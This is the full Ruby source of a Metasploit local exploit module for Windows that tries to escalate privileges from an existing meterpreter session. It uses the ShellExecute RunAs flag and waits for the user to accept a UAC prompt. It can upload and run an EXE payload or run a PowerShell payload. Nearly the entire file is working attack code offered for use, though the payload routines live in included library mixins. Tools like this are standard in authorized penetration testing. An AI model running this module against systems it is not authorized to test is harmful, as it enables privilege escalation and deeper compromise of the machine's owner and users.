##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Escalate UAC Execute RunAs',
      'Description'   => %q(
        This module will attempt to elevate execution level using
        the ShellExecute undocumented RunAs flag to bypass low
        UAC settings.
      ),
      'License'       => MSF_LICENSE,
      'Author'        => [
        'mubix', # Original technique
        'b00stfr3ak' # Added powershell option
      ],
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter'],
      'Targets'       => [['Windows', {}]],
      'DefaultTarget' => 0,
      'References'    => [
        ['URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html']
      ],
      'DisclosureDate' => 'Jan 3 2012'
    ))

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      OptBool.new('UPLOAD', [true, 'Should the payload be uploaded?', true]),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
    ])
  end

  def exploit
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        print_good 'UAC is not enabled, no prompt for the user'
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    #
    # Generate payload and random names for upload
    #
    case datastore['TECHNIQUE']
    when 'EXE'
      execute_exe(datastore['FILENAME'], datastore['PATH'], datastore['UPLOAD'])
    when 'PSH'
      execute_psh
    end
  end
end